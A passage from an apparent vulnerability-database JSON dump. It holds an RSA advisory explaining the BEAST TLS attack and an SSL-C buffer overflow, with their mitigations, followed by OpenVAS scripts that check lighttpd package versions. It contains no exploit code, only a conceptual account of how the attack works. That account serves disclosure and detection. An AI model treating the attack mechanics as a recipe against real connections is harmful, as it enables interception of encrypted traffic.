SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.\r\n \r\nThe BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.\r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\r\n \r\n2. Buffer Overflow vulnerability (CVE-2012-2110/CVE-2012-2131)\r\nSSL-C contains code that does not properly interpret integer data, which could allow buffer overflow attacks using crafted DER (Distinguished Encoding Rules) data, such as in X.509 certificate or an RSA asymmetric key.\r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n \r\nRecommendation:\r\nFor the BEAST vulnerability:\r\nThe best way to help prevent this attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 might cause interoperability issues.\r\n \r\nA second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.\r\n \r\nIn SSL-C 2.8.9, the way to prevent the BEAST exploit is to introduce some unknown data into the encryption scheme, prior to the attackers inserted plain text data. This is done as follows:\r\n1. After the first encrypted record is sent, any plaintext to be encrypted is split into two blocks of plaintext. The blocks of data are then sent as two encrypted records; the first encrypted record contains the first byte of data and the second encrypted record contains the rest.\r\n2. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block of plaintext.\r\n3. The one byte of data along with the MAC is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.\r\n \r\nNOTE: In SSL-C 2.8.9, this mitigation for the BEAST exploit is enabled by default. No code changes are required to protect against it. \r\n \r\nIn special cases, if required, the BEAST exploit mitigation, either for an SSL context or SSL object can be disabled by calling SSL_CTX_set_options() or SSL_set_options() respectively with the SSL_OP_NO_BEAST_MITIGATION identifier.\r\n \r\nNote the following about packet splitting:\r\n- - Splitting only occurs for negotiated cipher suites that use CBC mode.\r\n- - Only application data packets are split. Handshake packets are not split.\r\n- - Blocks of plaintext are split for each subsequent call to write data to the SSL connection after the first write is sent.\r\n \r\nFor more information about these functions and identifiers, see the RSA BSAFE SSL-C 2.8.9 API Reference Guide.\r\n \r\n RSA strongly recommends that RSA BSAFE SSL-C customers upgrade to RSA SSL-C 2.8.9 or later to resolve both the BEAST and the Buffer Overflow vulnerabilities.\r\n \r\nObtaining Downloads: \r\nTo request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.emc.com/support/rsa/contact/phone-numbers.htm) for most expedient service. \r\n\r\nObtaining Documentation:\r\nTo obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.\r\n\r\nSeverity Rating:\r\nFor an explanation of Severity Ratings, refer to the Knowledge Base Article, \u201cSecurity Advisories Severity Rating\u201d at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nObtaining More Information:\r\nFor more information about RSA products, visit the RSA web site at http://www.rsa.com.\r\n\r\nGetting Support and Service:\r\nFor customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.\r\n\r\nGeneral Customer Support Information:\r\nhttp://www.emc.com/support/rsa/index.htm\r\n\r\nRSA SecurCare Online:\r\nhttps://knowledge.rsasecurity.com\r\n\r\nEOPS Policy:\r\nRSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. \r\nhttp://www.emc.com/support/rsa/eops/index.htm\r\n\r\nSecurCare Online Security Advisories\r\nRSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nAbout RSA SecurCare Notes & Security Advisories Subscription\r\nRSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you\u2019d like to stop receiving RSA SecurCare Notes & Security Advisories, or if you\u2019d like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.\r\n\r\nSincerely,\r\nRSA Customer Support\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlM9gD8ACgkQtjd2rKp+ALzbvgCeL8alKy39Gfj1A6jtJoFJ+IG3\r\nufMAnReinZ/m4NifCfqyg98TIleiuOvc\r\n=Pb/v\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2014-04-07T00:00:00", "type": "securityvulns", "title": "ESA-2012-029: RSA BSAFE\u00ae SSL-C Multiple Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2011-3389", "CVE-2012-2110"], "modified": "2014-04-07T00:00:00", "id": "SECURITYVULNS:DOC:30448", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30448", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:39:20", "description": "The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2368-1 (lighttpd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070687", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070687", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2368_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2368-1 (lighttpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70687\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2011-3389\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:14:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2368-1 (lighttpd)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202368-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\nXi Wang discovered that the base64 decoding routine which is used to\ndecode user input during an HTTP authentication, suffers of a signedness\nissue when processing user input. As a result it is possible to force\nlighttpd to perform an out-of-bounds read which results in Denial of\nService conditions.\n\nCVE-2011-3389\n\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\ncertain client, a so called BEAST attack allows man-in-the-middle\nattackers to obtain plaintext HTTP traffic via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session. Technically this is\nno lighttpd vulnerability. However, lighttpd offers a workaround to\nmitigate this problem by providing a possibility to disable CBC ciphers.\n\nThis updates includes this option by default. System administrators\nare advised to read the NEWS file of this update (as this may break older\nclients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your lighttpd packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:50:53", "description": "The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2368-1 (lighttpd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70687", "href": "http://plugins.openvas.org/nasl.php?oid=70687", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2368_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2368-1 (lighttpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in lighttpd, a small and fast\nwebserver with minimal memory footprint.\n\nCVE-2011-4362\n\nXi Wang discovered that the base64 decoding routine which is used to\ndecode user input during an HTTP authentication, suffers of a signedness\nissue when processing user input. As a result it is possible to force\nlighttpd to perform an out-of-bounds read which results in Denial of\nService conditions.\n\nCVE-2011-3389\n\nWhen using CBC ciphers on an SSL enabled virtual host to communicate with\ncertain client, a so called BEAST attack allows man-in-the-middle\nattackers to obtain plaintext HTTP traffic via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session. Technically this is\nno lighttpd vulnerability. However, lighttpd offers a workaround to\nmitigate this problem by providing a possibility to disable CBC ciphers.\n\nThis updates includes this option by default. System administrators\nare advised to read the NEWS file of this update (as this may break older\nclients).\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.30-1.\n\n\nWe recommend that you upgrade your lighttpd packages.\";\ntag_summary = \"The remote host is missing an update to lighttpd\nannounced via advisory DSA 2368-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202368-1\";\n\nif(description)\n{\n script_id(70687);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-4362\", \"CVE-2011-3389\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:14:22 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2368-1 (lighttpd)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.19-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:56", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: lighttpd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2017-04-14T00:00:00", "id": "OPENVAS:70584", "href": "http://plugins.openvas.org/nasl.php?oid=70584", "sourceData": "#\n#VID c6521b04-314b-11e1-9cf4-5404a67eef98\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c6521b04-314b-11e1-9cf4-5404a67eef98\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: lighttpd\n\nCVE-2011-4362\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70584);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 5956 $\");\n script_name(\"FreeBSD Ports: lighttpd\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"lighttpd\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.30\")<0) {\n txt += 'Package lighttpd version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-28T00:00:00", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9078", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864498", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9078\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864498\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:02 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-9078\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9078\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.31~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-02T10:58:23", "description": "Check for the Version of lighttpd", "cvss3": {}, "published": "2012-06-28T00:00:00", "type": "openvas", "title": "Fedora Update for lighttpd FEDORA-2012-9078", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:864498", "href": "http://plugins.openvas.org/nasl.php?oid=864498", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2012-9078\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"lighttpd on Fedora 16\";\ntag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\n for high-performance environments. It has a very low memory footprint compared\n to other webservers and takes care of cpu-load. Its advanced feature-set\n (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\n it the perfect webserver-software for every server that is suffering load\n problems.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082686.html\");\n script_id(864498);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:02 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2011-4362\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9078\");\n script_name(\"Fedora Update for lighttpd FEDORA-2012-9078\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == 